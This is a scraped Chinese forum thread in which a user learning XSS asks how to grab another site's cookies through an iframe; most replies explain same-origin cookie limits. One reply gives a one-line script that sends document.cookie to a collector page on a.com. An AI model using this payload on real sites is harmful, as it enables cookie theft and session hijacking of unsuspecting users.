iframe跨站成功后,如何提取网站的Cookie? 最近在学着玩xss,默认情况下,iframe是禁止发送stored cookie的,那么真的没有办法在利用iframe实现跨站后提取cookie吗?望高手指点下迷津。 解决方案 » 免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货 你可以通过 curl 在自己的服务器上做代理 再说网站互通, 共用一个域名cookie, 估计谁都不愿意除非进入共产主义时代 我要的不是这样的效果,其实可以变通下,我在a.com下做了个页面,其中有一个iframe访问了b.com的页面,我需要在a.com的网页中取得b.com的cookie b.com的cookie存放在打开网页的人的浏览器里存放文件里, 你在a.com的服务器上怎么抓?还是你想表达的意思不是这样、? 没用过 curl.不过COOKIE 是由不同的域名组成. 也算是基于安全问题的缺陷,所以不带有跨域功能的. b.com/cookie.html:<script>document.location='http://a.com/catch.php?cookie='+document.cookie;</script>弄到你自己的域下,你想搞什么就随便了 别想了,那是异想天开,如果可以的话,那用户的信息就没保证了,一般网站会使用广告投放系统。如百度、google,还有一些合作。如果可以收集的话。你把用户的登录cookie获取了,再模拟这个cookie。那你就可以用这个用户登录了。浏览器是不会这样的做的,flash不知道可以不可以,但前提也必须在服务器端加配置文件 访问页面空白,刷新后正常 请教如何使用php168 搞编程有前途吗? 静态缓存 与编译缓存原理 请高手指点一番 谢谢 php连接mysql假死怎么办? 求助:php解密 后台有一个推荐功能,在后台修改推荐时修改不了,而可以修改其他的 虚拟机与主机ping不通 php qq互联,怎么会前后的session不一样 PHP分页点击下一页和上一页都是空白? php加水印问题 mysql里怎么获取一个时间段每一天的数据
我要的不是这样的效果,其实可以变通下,我在a.com下做了个页面,其中有一个iframe访问了b.com的页面,我需要在a.com的网页中取得b.com的cookie
b.com的cookie存放在打开网页的人的浏览器里存放文件里,
你在a.com的服务器上怎么抓?还是你想表达的意思不是这样、?
不过COOKIE 是由不同的域名组成. 也算是基于安全问题的缺陷,所以不带有跨域功能的.
b.com/cookie.html:<script>document.location='http://a.com/catch.php?cookie='+document.cookie;</script>
弄到你自己的域下,你想搞什么就随便了